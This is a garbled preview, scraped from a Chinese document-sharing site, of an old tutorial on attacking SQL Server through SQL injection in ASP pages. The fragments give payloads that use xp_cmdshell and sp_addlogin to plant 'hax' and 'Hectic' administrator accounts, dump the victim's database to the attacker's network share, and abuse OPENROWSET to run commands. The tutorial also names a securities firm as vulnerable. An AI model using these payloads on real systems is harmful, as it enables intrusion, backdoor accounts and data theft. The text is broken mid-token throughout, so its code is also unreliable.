資源描述:
《sqlserver安全專題sqlserver數(shù)據(jù)庫的一些攻擊》由會員上傳分享,免費在線閱讀,更多相關(guān)內(nèi)容在學(xué)術(shù)論文-天天文庫。
1、SQLServer安全專題SQLServer數(shù)據(jù)庫的一些攻擊>>教育資源庫 編者:如何保障aster.dbo.sp_addloginhax;-- neaster.dbo.sp_passaster.dbo.sp_addsrvrolemembersysadminhax;-- neaster.dbo.xp_cmdshell'userhaxhax/es:all/passaster.dbo.xp_cmdshell'localgroupadministratorshax/add';-- 這樣,你在他的數(shù)據(jù)庫和系統(tǒng)內(nèi)都留下了hax管理員賬號了 當(dāng)
2、然,前提條件是ASP用管理員賬號,所以虛擬空間大家就別試了,不會存在這個漏洞的。 以后我們會討論,如果對方的ASP不是用SQL管理員賬號,我們?nèi)绾稳肭?,?dāng)然也會涉及到1433端口的入侵 當(dāng)然大家可以試試看在id=2后面加上一個'符號,主要看對方的ASP怎么寫了 再說說當(dāng)ASP程序使用的SQL賬號不是管理員的時候我們該如何做。 假設(shè)有如下頁面 nee()函數(shù)吧 打開你的queryanalyzer,看看printdb_name(),呵呵,當(dāng)前的數(shù)據(jù)庫名就出來了 以次類推,如下:declareasysname;seta=db_name();backu
3、pdatabaseatodisk='你的IP你的共享目錄bak.dat',name='test';-- 呵呵,他的當(dāng)前數(shù)據(jù)庫就備份到你的硬盤上了,接下來要做的大家心里都明白了吧 同理這個方法可以找到對方的SQL的IP 先裝一個防火墻,打開ICMP和139TCP和445TCP的警告提示 然后試試看neaster.dbo.xp_cmdshell'ping你的IP' 如果防火墻提示有人ping你,那么因該可以肯定對方的ASP用的是SQL的管理員權(quán)限,同時也確定了對方的SQLServer的準(zhǔn)確位置,因為很多大一點的網(wǎng)
4、站考慮性能,會把dshell了,該怎么辦? 別著急,試試看這個nee();backupdatabaseatodisk='你的IP你的共享目錄bak.dat',name='test';--123下一頁>>>>這篇文章來自..,。呵呵,你的防火墻該發(fā)出警告了,有人連接你的445或139(dshell這些關(guān)鍵字了 所有以上url希望大家通過vbscript提交,因為瀏覽器的地址欄會屏蔽一些特殊字符,這樣你的命令就不能完整傳輸了 dshell調(diào)用限制很大,其實這里面還有很多值得深入的地方比如 .guosen..。國信證卷就有這個問題,
5、而且他們采用ms的三層結(jié)構(gòu)作的用以前說的xp_cmdshell做法就不行了,字符串會被過濾,但是 我嘗試了,用sql的異類請求仍然可以在對方的機(jī)器上開啟tel服務(wù)和administrators組的賬號!由于對方防火墻很嚴(yán)checkpoint數(shù)據(jù)報進(jìn)出 都只開放80端口,因此,要想獲得他的數(shù)據(jù)庫結(jié)構(gòu)比較困難了,但是還是有辦法可以做到的:P 順便提醒大家注意一下關(guān)于sqloledb,db_name,openroopenroyserver';'sa';'','select*fromtable') 可見(即使從
6、字面意義上看)openrodshell呢?答案是肯定的! select*fromopenrotonlyoffexecmaster.dbo.xp_cmdshell''dirc:''') 必須加上setfmtonlyoff用來屏蔽默認(rèn)的只返回列信息的設(shè)置,這樣xp_cmdshell返回的output集合就會提交給前面的select顯示,如果采用默認(rèn)設(shè)置,會返回空集合導(dǎo)致select出錯,命令也就無法執(zhí)行了?! ∧敲慈绻覀円{(diào)用sp_addlogin呢,他不會像xp_cmdshell返回任何集合的,我們就不能再依靠fmtonl
7、y設(shè)置了,可以如下操作 select*fromopenroaster.dbo.sp_addloginHectic') 這樣,命令至少會返回select'OK!'的集合,你的機(jī)器商會顯示OK!,同時對方的數(shù)據(jù)庫內(nèi)也會增加一個Hectic的賬號,也就是說,我們利用 select'OK!'的返回集合欺騙了本地的select請求,是命令能夠正常執(zhí)行,通理sp_addsrvrolemember和opendatasource也可以如此操作!至于 這個方法真正的用處,大家慢慢想吧:P 2。關(guān)于msdasql兩次請求的問題 不